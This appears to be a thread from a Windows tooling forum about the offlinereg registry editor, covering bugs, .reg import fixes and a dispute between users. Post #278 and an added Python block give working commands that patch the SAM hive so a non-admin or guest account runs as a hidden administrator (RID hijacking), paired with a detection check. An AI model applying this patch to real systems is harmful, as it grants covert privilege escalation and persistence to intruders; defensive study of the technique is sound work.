
offlinereg



#276 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 17 March 2019 - 03:11 PM

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 


Edited by osfixer, 17 March 2019 - 03:21 PM.


#277 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 19 March 2019 - 03:19 PM

What you could also do is add support for adjusting permissions for keys and values.

This could be done only through the command line, I think.

 

Does offlinereg respect the inherited user, if the process is launched with a SYSTEM or TI token?

If it doesn't, you could add an /inherit switch.

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 19 March 2019 - 03:25 PM.


#278 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 02:33 PM

Following a post here on how to blank an account's password using offlinereg, this time, let's see how to perform "RID hijacking".

The local admin account has a 01F4 RID.
What about "patching" another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem let's write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin tasks.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trusts SAMSRV and SAMSRV trusts the registry: everyone is happy...

This can work with the guest account as well.

I tested this with success from a WinPE against Windows 10.
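The byte surgery in the post above, redone in Python as an added example (this is not OfflineReg's code and not part of erwan.l's post). It reads and overwrites the RID DWORD at offset 0x30 of a user key's F value, lists the (value, offset) pairs that correspond to the `setvaluebyteat f <value> <offset>` commands, and adds the check a defender would run over SAM\Domains\Account\Users: the key name is the RID in hex, so after a hijack it no longer agrees with the RID stored inside F. Only the RID field of F is modelled; the sample blob is constructed (zeros apart from that field) and its 0x50 length is an assumption, not a parse of a real hive.

```python
import struct

# Offset of the RID inside a user key's F value (SAM\Domains\Account\Users\<rid>\F),
# stored as a little-endian DWORD; 0x30 = 48 decimal, as in the setvaluebyteat commands.
RID_OFFSET = 0x30
ADMIN_RID = 0x1F4          # 500: built-in Administrator
F_LEN = 0x50               # assumed length of the constructed sample only


def make_sample_f(rid: int) -> bytes:
    """Constructed stand-in for an F value: all zero except the RID field."""
    buf = bytearray(F_LEN)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def read_rid(f_value: bytes) -> int:
    """Return the RID stored in the F value (the one SAMSRV hands to LSASS)."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to hold a RID at offset 0x30")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def patch_rid(f_value: bytes, new_rid: int) -> bytes:
    """What the setvaluebyteat writes achieve: overwrite the RID DWORD in place."""
    buf = bytearray(f_value)
    struct.pack_into("<I", buf, RID_OFFSET, new_rid)
    return bytes(buf)


def byte_writes(new_rid: int) -> list:
    """(value, offset) pairs for `setvaluebyteat f <value> <offset>`; all four bytes are
    listed, the post only writes the two that differ from the zeros already there."""
    return [(b, RID_OFFSET + i) for i, b in enumerate(struct.pack("<I", new_rid))]


def check_user_key(key_name: str, f_value: bytes) -> dict:
    """Detection: the key name under Users\\ is the RID in hex and must equal the RID in F."""
    name_rid = int(key_name, 16)
    f_rid = read_rid(f_value)
    return {"name_rid": name_rid, "f_rid": f_rid, "hijacked": name_rid != f_rid}


def scan_users(users: dict) -> list:
    """users maps key name -> F bytes (the caller leaves out the 'Names' subkey)."""
    return [name for name, f in users.items() if check_user_key(name, f)["hijacked"]]


if __name__ == "__main__":
    original = make_sample_f(0x3E8)           # RID 1000: E8 03 00 00 at 0x30
    patched = patch_rid(original, ADMIN_RID)  # now F4 01 00 00
    print(hex(read_rid(original)), "->", hex(read_rid(patched)))
    print(byte_writes(ADMIN_RID))
    print(scan_users({"000001f4": make_sample_f(0x1F4), "000003e8": patched}))
```

The mismatch check is the practical takeaway for the blue side: group membership will look clean, as the post says, but the key name and the F value cannot both be right once the RID has been patched.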



#279 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 02:55 PM

This can work with the guest account as well.


Nice :)

And once again all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it



#280 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 03:04 PM

Nice :)

And once again all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type the BIOS password, but it is perfectly valid in a home environment.

 

Disk encryption like BitLocker addresses a lot of these "local" attacks, although I feel BitLocker could shortly be broken without even having to get the key from the TPM chip...



#281 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 03:12 PM

BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type this password, but it is perfectly valid in a home environment.

 

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.



#282 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 03:21 PM

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environment and it is already a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first name, x letters for last name, etc), thus regularly witnessing users who forget their username because it is so cryptic.

And then an 8+ character password which has to include digits AND non-alphanumeric chars, with a policy preventing the use of the last 16 passwords...

 

That alone is enough to keep dozens of IT ppl busy every day :)

I can see the massive nervous breakdown it would be if we were to ask them to remember the computer BIOS password.

 

Now, on a good side, in big corp environments, SSO/delegation makes it so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall though: if the user credentials get compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy - I really would not want to be a blue team sec guy :)



#283 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 03:33 PM

That alone is enough to keep dozens of IT ppl busy every day :)

 

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

Usual activities of IT people I know:

1) Saying NO, it is NOT possible to whatever request

2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.

3) In all other cases do something (usually trivial) and make it seem like it is:

a. difficult

b. possibly very, very difficult

c. even better, very, very difficult AND tiring

 

:duff:

Wonko



#284 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 03:45 PM

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

...

 

Sounds like you have had bad experiences with IT departments :)

 

Running an IT dpt, I have a different experience.

A good dpt will be organised in different levels using ITIL processes and based on a service catalog with SLA's:

-level 1 facing users with one task: solve the issue/address the request in less than 30 mins max, with an objective of 60% of all tickets solved in L1

-level 2 specialised in different fields (networks, systems, etc) mainly focusing on more complex requests, with an objective of 30% of all tickets solved in L2

-level 3 specialised in a field (network for example) AND a platform/solution (checkpoint/fortigate/etc), liaising with vendors/editors if it really needs to

 

Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient manner.

 

Now I am more into IT Ops and I appreciate that addressing new needs, especially around Apps, is quite different and possibly deals more with project management.

 

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do, which leads to nice discussions :)

 

Now, maybe we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive :lol:



#285 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 04:04 PM

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do, which leads to nice discussions :)

 

So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right ;).

 

Your particular IT department   :worship:  is then definitely the exception that confirms the rule. 

 

 

Now, maybe we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive :lol:

Agreed :)

 

:duff:

Wonko



#286 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 06:11 PM

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg

[ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
main error:Access violation

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
"Machine"="" ; Network access: Remotely accessible registry paths (None).

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths]
"Machine"="" ; Network access: Remotely accessible registry paths and subpaths (None).

Edited by osfixer, 29 March 2019 - 06:21 PM.


#287 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 29 March 2019 - 06:54 PM

 

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

 

Good news for you is that you dont have to use it : life is good ! :)

It is not as if I had not warned you several times that I have put little effort into the import command and that you should prefer reg load/unload for this specific matter...



#288 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 06:55 PM

So you are intentionally not fixing bugs? That is really weird.



#289 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 29 March 2019 - 06:56 PM

So you are intentionally not fixing bugs? That is really weird.

 

Not exactly.

I am intentionally defining my priorities.

Nothing weird there: I believe all human beings do so.



#290 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 06:58 PM

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..


Edited by osfixer, 29 March 2019 - 06:58 PM.


#291 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 29 March 2019 - 07:01 PM

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..

 

Lets stop the discussion there.

You dont like the tool? You know of other tools? All fine with me.

 

I am not asking for any credit but at the same time I will not accept negative comments, nor will I try to decrypt your understatements.

 

You have been gently warned.

Dont spoil my fun.



#292 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 07:04 PM

Instead of saying thanks for discovering your bugs in your software, you are
now saying sorry can't do. Heh.



#293 darren rose

darren rose

    Frequent Member

  • Advanced user
  • 455 posts
  • Location:Norwich, Norfolk
  •  
    United Kingdom

Posted 30 March 2019 - 02:06 PM

@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude. He creates tools for us to use for free out of kindness; he has a job to do like all of us, so can only devote limited time to these projects. Why not just be grateful for what he does? If it doesn't do what you want then use something else. All of us here on this forum appreciate the work others do, and understand it is a hobby or side project; we don't demand fixes and then get stroppy when we don't like the answers. Perhaps take your attitude elsewhere.

 

@erwan.l - I personally thank you for all you do, and use some of your tools such as this which work well for me, I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with



#294 misty

misty

    Gold Member

  • Developer
  • 1070 posts
  •  
    United Kingdom

Posted 25 April 2019 - 09:11 PM

@Erwan
Hello my friend. Due to another long absence on my part it has been some time since we crossed paths. It was with some sadness that I caught up with recent comments in this thread. You handle negative feedback and criticism with a maturity that does you credit.

Your continued efforts in developing and sharing your work are always appreciated by me, and no doubt many others. I hope you continue having fun here for years to come.

OfflineReg does many tasks very well, and as you have pointed out, there are alternatives out there for some functions.

I will try to catch up with the changes in your latest release - this is always an interesting process when your version numbers are taken into consideration :whistling:

Misty

#295 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3042 posts
  • Location:Nantes - France
  •  
    France

Posted 29 April 2019 - 05:56 PM

Hey Misty,

 

Long time no see :)

 

Thanks for your kind words !

No worries: I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) and as long as I can remember I have encountered "challenging" behaviors...

Thus, I am still there and having fun and I am planning on making it another 25 years (at least !).

 

Think about it, Wonko has been there since dos 3.1 (if not VAX.VMS) and he is still this charming guy we know of  :cheers:

If he can do it, I can do it  :lol:

 

About versioning, well, hopefully Wonko will miss that post and not comment on that one (...) but there is some hope: I am currently migrating as much code as possible to Lazarus/FreePascal and this new IDE gives me some more capabilities there.

In short, all binaries should see the build number increase automatically, and the software should also display the build number automatically (getting it from the binary itself) - example here with vmount (lately migrated from Delphi 7 to FPC).

I will also stick to a version.txt containing some extra binary details.

And I may even go as far (as some other dev guys on this forum) as including the build number in the filename.

 

It could be a good idea to define our own standards here on this forum in a dedicated post.

 

There are some great experienced guys on this forum who could share their views there.

 

Regards,

Erwan



#296 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 29 April 2019 - 07:46 PM

No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) a

 

Yeah, definitely kids today ;):

https://tinyapps.org..._in_my_day.html

 

About versionning, well hopefully, Wonko miss that post  ...

 ... after 25 years are you still grasping at straws logical impossibilities? :w00t:

 

 

 

 and not comment on that one (...) but there is some hope 

 

By pure chance, Wonko happens to be in exceptionally good mood today thus your request is exceptionally granted [1].

 

 

 

:duff:

Wonko

 

 

 

[1]but this of course doesn't exclude the matter from future conversations on the public park bench ;)



#297 alacran

alacran

    Platinum Member

  • .script developer
  • 2710 posts
  •  
    Mexico

Posted 16 December 2019 - 09:18 PM

Just to let you know my findings with this fantastic tool from erwan.l

 

It works fine from the full OS or from a WinPE. In order to run some tests with it, from my full Win 7 x64 I mounted, by means of DismMountService, an old boot.wim from my 7pe_amd64_E to the C:\temp folder; the idea was to copy wofadk.sys into its Windows\System32\drivers folder and install the service to run wofadk.sys when booting from the WinPE.

 

This is the reg file for wofadk.sys:

Spoiler

 

Then I just copied the mentioned file to the required location and, in an elevated command prompt opened in the same folder where offlinereg-win64 and WofAdk.reg are located, ran this command:

 

offlinereg-win64 "C:\temp\Windows\System32\config\system" "D:\Aplicaciones\offlinereg\WofAdk.reg" import WofAdk.reg

 

EDIT-1: It is better to use: offlinereg-win64 "C:\temp\Windows\System32\config\system" " " import WofAdk.reg

 

And it did its magic and all the reg was applied to the mounted boot.wim. Then, just to make sure all was done fine, I opened the C:\temp\Windows\System32\config\system file with Offlinereg_Gui.exe and to my surprise everything was copied from the reg file except the part related to:

 

"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
  52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
  00,2e,00,73,00,79,00,73,00,00,00

 

This was not copied correctly (maybe too long), as you can see in the attached pictures; all that hex only says system32\DRIVERS\wofadk.sys

 

But by means of the GUI it was very easy to delete the two last lines and edit the ImagePath value to system32\DRIVERS\wofadk.sys, then just save and that was all; of course I reopened it to verify the changes were done.

Then I just dismounted the boot.wim, committing the changes.

 

To summarize:

  • With this tool there is no need to mount a registry hive.
  • On the command line, edits/additions are made immediately.
  • On the command line, long hex values are not applied correctly, but they can be edited in the GUI. (1)
  • In the GUI it is necessary to save the changes and close the hive before closing the GUI.
  • This little tool is fantastic to edit the offline registry of an attached VHD directly, or of an installed OS running the tool from another OS or a WinPE, or of a mounted WIM file.
  • Also it is necessary to split our reg files depending on the section (hive) of the registry we want to edit (system, software, etc.), import only the reg file related to that hive, and then repeat the procedure for the next hive.

EDIT-2: (1) The cause of this issue was found by erwan.l, and there is an easy way to avoid it see:

 

From: http://reboot.pro/to...-13#entry213675

 

I believe the issue is either with crlf and/or the ucs-2 format (your file has "magical" chars $fffe at the start of the file which you can see in a hex editor).

 

Copy paste the below to fresh new text file and try again to exclude the ucs-2 issue (i.e do not use the reg file generated by regedit).

 

And my test using this recommendation: http://reboot.pro/to...-13#entry213678

 

 

And all worked fine, see attached picture, so this means we can't use reg files generated by regedit, or we need to do some trick to them before using them; please explain.

 

And the next test: http://reboot.pro/to...-13#entry213679

 

 

Answering myself: (after just testing the following)

 

If we copy the content of a reg file generated by regedit.exe to a new text file and then save it as xxxxx.reg, then it can be used without any problem on Offlinereg.

 

Then only to summarize: The reg import feature is working fine, when using the fixed reg file.

 

alacran

Attached Thumbnails

  • Wrong.png
  • Edited on GUI.png

Edited by alacran, 21 December 2019 - 11:35 PM.
Issue fixed


#298 alacran

alacran

    Platinum Member

  • .script developer
  • 2710 posts
  •  
    Mexico

Posted 16 December 2019 - 10:08 PM

Now my old 7pe_amd64_E is capable of applying, by means of WinNTSetup, the WIM (Index:X) image files in Wimboot or Compact mode, without the need to rebuild it, as proved by the attached picture, where we can see the wofadk service is running.

 

alacran

Attached Thumbnails

  • From the WinPE.png


#299 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 17 December 2019 - 09:04 AM

Try using the hex string without the \ (which means "new line" in .reg files but is not accepted normally in command line).

 

I.e. this:

 

 

"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
00,2e,00,73,00,79,00,73,00,00,00

may not work, but this:

 

 

"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,00,2e,00,73,00,79,00,73,00,00,00

should.

 

:duff:

Wonko
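The two things that tripped up the import in this exchange (alacran's regedit export in UCS-2 with the FF FE marker, found in #297, and the backslash-wrapped hex(2) value Wonko unfolds above) can both be fixed before the file reaches OfflineReg. The Python below is an added example, not OfflineReg code or anyone's posted script: it decodes a regedit-style export whatever its BOM, folds the continuation lines into the single-line form Wonko shows, and decodes the hex(2) bytes back to the REG_EXPAND_SZ string so the value can be checked rather than eyeballed. The export bytes are constructed here around the ImagePath value quoted in the thread; the service key path in the sample is an assumption.

```python
import codecs
import re

# Constructed regedit-style export: UTF-16LE with a FF FE BOM, CRLF line ends, and the
# ImagePath value wrapped with trailing backslashes exactly as quoted in the thread.
# The key path is an assumption for the sample, not taken from the original reg file.
SAMPLE_EXPORT = codecs.BOM_UTF16_LE + (
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wofadk]\r\n"
    "\"ImagePath\"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\\\r\n"
    "  52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\\\r\n"
    "  00,2e,00,73,00,79,00,73,00,00,00\r\n"
).encode("utf-16-le")

# "name"=hex(T):aa,bb,... after continuation lines have been folded.
HEX_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=hex\((?P<type>[0-9a-fA-F]+)\):(?P<data>[0-9a-fA-F,]*)$')


def load_reg_text(raw: bytes) -> str:
    """Decode a .reg file whatever its encoding: UTF-16LE with BOM (regedit), UTF-8 with BOM, or plain."""
    if raw.startswith(codecs.BOM_UTF16_LE):
        text = raw[len(codecs.BOM_UTF16_LE):].decode("utf-16-le")
    elif raw.startswith(codecs.BOM_UTF8):
        text = raw[len(codecs.BOM_UTF8):].decode("utf-8")
    else:
        text = raw.decode("utf-8")
    return text.replace("\r\n", "\n")


def join_continuations(text: str) -> list:
    """Fold regedit's wrapped values (trailing '\\', indented next line) into one logical line each."""
    logical, pending = [], ""
    for line in text.split("\n"):
        stripped = line.strip()
        piece = stripped if pending else line      # continuation lines carry two leading spaces
        if stripped.endswith("\\"):
            pending += piece.rstrip()[:-1]           # drop the marker, keep the trailing comma
            continue
        logical.append(pending + piece)
        pending = ""
    if pending:                                      # file ended on a continuation marker
        logical.append(pending)
    return logical


def normalize_reg(raw: bytes) -> str:
    """Text a plain editor would save: no BOM, no wrapped values, CRLF line ends."""
    return "\r\n".join(join_continuations(load_reg_text(raw)))


def decode_hex_value(logical_line: str):
    """Parse '"name"=hex(T):...'; string types are UTF-16LE. Returns None for other lines."""
    m = HEX_VALUE_RE.match(logical_line)
    if not m:
        return None
    reg_type = int(m.group("type"), 16)
    data = bytes(int(b, 16) for b in m.group("data").split(",") if b)
    if reg_type in (1, 2):                           # REG_SZ, REG_EXPAND_SZ: one NUL-terminated string
        value = data.decode("utf-16-le").split("\x00")[0]
    elif reg_type == 7:                              # REG_MULTI_SZ: NUL-separated, double-NUL terminated
        value = [s for s in data.decode("utf-16-le").split("\x00") if s]
    else:
        value = data                                 # REG_BINARY and the rest: raw bytes
    return m.group("name"), reg_type, value


if __name__ == "__main__":
    for line in join_continuations(load_reg_text(SAMPLE_EXPORT)):
        decoded = decode_hex_value(line)
        print(line if decoded is None else decoded)
```

Writing `normalize_reg(raw)` back out with an ASCII or ANSI encoding gives the same result as alacran's copy-into-a-fresh-text-file trick, and the decoded `ImagePath` is what to compare against the GUI after the import.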



#300 alacran

alacran

    Platinum Member

  • .script developer
  • 2710 posts
  •  
    Mexico

Posted 17 December 2019 - 05:44 PM

Thanks Wonko I will try it the way you suggested and report back my findings.

 

alacran





